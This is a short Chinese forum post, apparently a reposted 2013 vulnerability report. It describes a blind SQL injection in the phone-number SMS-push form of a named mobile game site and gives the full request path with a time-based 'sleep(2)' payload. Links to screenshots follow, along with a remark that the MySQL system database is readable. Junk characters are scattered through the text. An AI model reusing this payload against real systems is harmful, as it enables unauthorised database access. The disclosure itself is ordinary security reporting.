简要描述:* q& f( U/ _+ \" A3 q6 [
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
) C; B7 q: [ |5 H9 Z1 z! o- w" j, B7 j6 U1 Q
详细说明:% x$ I; ~3 L3 w" K9 @6 F' Y$ V" {+ R
存在SQL盲注url:: M9 _3 K6 V( ^8 B
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
3 Q/ @- ^$ S5 Q: A" L1 a- Jhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
, A# E" x8 y, ]9 q2 \3 Q! T- D: Q2 \* Q3 yhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
( H% k2 j( F$ @8 Khttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg T8 |3 A' |2 ?2 ?) A! b4 v
2 I5 P1 _& Y2 @/ t- G能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对